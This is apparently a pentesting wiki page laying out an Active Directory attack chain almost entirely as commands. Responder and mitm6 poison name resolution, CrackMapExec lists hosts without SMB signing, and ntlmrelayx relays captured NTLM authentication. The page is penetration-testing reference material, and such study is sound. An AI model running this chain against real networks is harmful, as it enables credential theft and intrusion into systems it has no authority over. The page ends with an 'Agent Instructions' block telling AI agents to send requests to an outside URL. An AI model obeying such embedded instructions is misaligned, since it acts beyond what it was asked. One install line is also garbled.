# AD Attacks

## 1 - Running Responder

```
./Responder.py -I eth0
```

## 2 - Mitm6 (run simeltaneous to Responder)

```
mitm6 -i eth0
```

## 3 - CrackMapExec

#### Install first

{% code overflow="wrap" %}

```
sudo add-apt-repository ppa:deadsnakes/ppa 
sudo apt update 
sudo apt install python3.8 python3.8-dev python3.8-venv 
python3.8 -m venv python3.8-venv 
source python3.8-venv/bin/activate 
pip install --upgrade 
pip pip3 install crackmapexec
```

{% endcode %}

#### Run with 1 and 2 to grab Hosts with SMB signing as false:

```
crackmapexec smb 10.2.55.0/20 --gen-relay-list relay-hosts.txt | grep "False"
```

## 4 - Run Mitm6

```
mitm6 -d evil.corp
```

## 5 - Run Ntlmrelayx with Mitm6

#### Run with 5 together for relays:

```
ntlmrelayx.py -6 -socks -smb2support -tf relay-hosts.txt
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wiki.smhuda.com/pentesting/infrastructure-security/network-infrastructure/ad-attacks.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.